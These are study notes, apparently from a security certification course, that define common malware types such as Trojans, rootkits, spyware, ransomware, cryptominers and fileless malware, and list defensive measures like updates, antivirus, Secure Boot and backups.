2.4 - Malware

Malware Overview

  • Definition: Malware is a broad term used to describe various types of malicious software that are undesirable to run on computers.

Examples of Malware Types

  • Information Gathering Malware

    • Designed to gather sensitive information from users' systems, such as keystrokes.

  • Botnets

    • Malware may collaborate with other infected systems to form large botnets for greater malicious capabilities.

  • Adware

    • Displays advertisements to generate revenue for attackers.

  • Viruses and Worms

    • Specific types of malware intended to invade and damage systems and documents.

Methods of Malware Access

  • Malware often targets vulnerabilities in software, which can be known or unknown.

  • Embedding Process

    • Once a vulnerability is identified, malware embeds itself into the operating system and can install additional software, such as remote-access backdoors.

  • Initial Execution

    • The process begins by executing malicious software in a system’s memory. This could be triggered by:

    • Malicious links in emails leading to infected websites.

    • Pop-ups on websites prompting users to click.

    • Drive-by downloads, where malware is automatically downloaded while visiting a site.

Protective Measures

  • Software Updates

    • Crucial for protecting against vulnerabilities; keep operating systems and applications updated to the latest versions.

Trojan Horse

  • Named after the Greek myth, where a deceptive object is used to gain access to a secure area.

  • Users unknowingly invite this malicious software into their systems.

  • Antivirus Software

    • Can often identify and block Trojan Horses before they embed themselves into the system.

  • Access and Rights

    • Once installed, Trojan Horses operate with the same access rights as the user, allowing extensive data and resource access.

  • Best Practices

    • Install only trusted software to mitigate risks associated with Trojans.

Rootkits

  • Definition

    • A rootkit is malware that embeds itself into the operating system, concealing its presence from detection tools like antivirus software.

  • Superuser Account

    • The term 'root' refers to the superuser account on Unix/Linux systems, affecting how rootkits operate.

  • Hiding Techniques

    • Rootkits hide from the operating system as well as other software that manages processes, making detection and removal challenging.

  • UEFI BIOS and Secure Boot

    • Newer systems use UEFI with Secure Boot to counter rootkits by preventing booting if any core system file changes are detected.

  • Rootkit Scanners

    • Many antivirus tools now include rootkit detection features, and specific removers may be necessary for certain rootkits.

Computer Viruses

  • Human Interaction

    • Viruses require users to execute applications to spread from one computer to another, commonly via downloads or USB drives.

  • Stealthiness

    • Viruses can be stealthy, often consuming significant resources which may slow down the system and hint at infection.

  • Frequency of Virus Development

    • Thousands of new viruses are developed weekly; constant updates to antivirus definitions are vital.

Spyware

  • Definition

    • Spyware monitors user activities and may keep records of mouse clicks and keystrokes.

  • Key Loggers

    • A specific type of spyware that tracks everything typed on the keyboard, sending that information back to the attacker regularly.

  • Security Challenges

    • Lack of encryption with keystrokes can lead to the exposure of sensitive information such as usernames and passwords.

Ransomware

  • Functionality

    • Encrypts users' documents and holds them ransom; victims must pay attackers to receive decryption keys.

  • Impact on Operating System

    • Typically, only user files are encrypted, while the OS remains operational to inform users about the ransom.

  • Backup Importance

    • Without backups, victims risk losing access to important data.

Bootloader and Malware

  • Embedding in Bootloader

    • Some advanced malware can embed itself within the bootloader, executing before the operating system starts, which constitutes another threat.

  • Prevention with Secure Boot

    • Secure Boot verifies bootloaders’ signatures, stopping altered loaders from executing during the boot process.

Cryptocurrency Malware

  • Cryptominers

    • Malware that uses victims’ processing power to mine cryptocurrency without their consent.

  • Identifying Cryptomining Malicious Software

    • High CPU usage often indicates cryptomining malware activity, making it more noticeable to the user.

Stalkerware

  • Definition

    • A type of surveillance software that tracks user activities and whereabouts, often with GPS capabilities.

  • Risks

    • Can invade privacy severely by capturing screenshots, recording conversations, and utilizing location data.

Fileless Malware

  • Nature

    • Operates without storing files on the system, making it difficult to detect through traditional scanning methods.

  • Execution Process

    • Usually triggered by user actions such as clicking on a link, which utilizes software vulnerabilities to operate within system memory.

Potentially Unwanted Programs (PUPs)

  • Classification

    • Not outright malicious but annoying software that can impact user experience and system performance.

  • Common Symptoms

    • PUPs may alter browser settings, generate unwanted ads, or slow down the system's overall functionality.

  • Detection and Prevention

    • Regularly running antivirus scans with updated definitions is essential for identifying and eliminating PUPs effectively.